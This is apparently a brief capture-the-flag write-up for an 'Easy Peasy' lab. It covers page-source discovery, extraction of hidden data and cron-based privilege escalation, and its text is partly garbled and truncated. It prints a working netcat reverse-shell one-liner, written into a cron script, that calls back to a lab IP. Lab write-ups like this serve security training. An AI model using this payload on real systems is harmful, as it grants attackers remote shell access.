Easy Peasy
Easy Peasy
Easy Peasy
π Initial Discovery
π» Letβs check the source of the page:
1
view-source:http://10.49.169.155:65524/n0th1ng3ls3m4tt3r/
π© Found flag 3!
π΅οΈ Extracting the Hidden Path
π‘ Remember the hidden path containing a binary image? I extracted the data from it using the password of that hash: 
β‘ Privilege Escalation
π I set up a malicious script in the secret cron job path:
1
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.49.106.140 4444 >/tmp/f' > /var/www/.mysecretcronjob.sh
This post is licensed under CC BY 4.0 by the author.












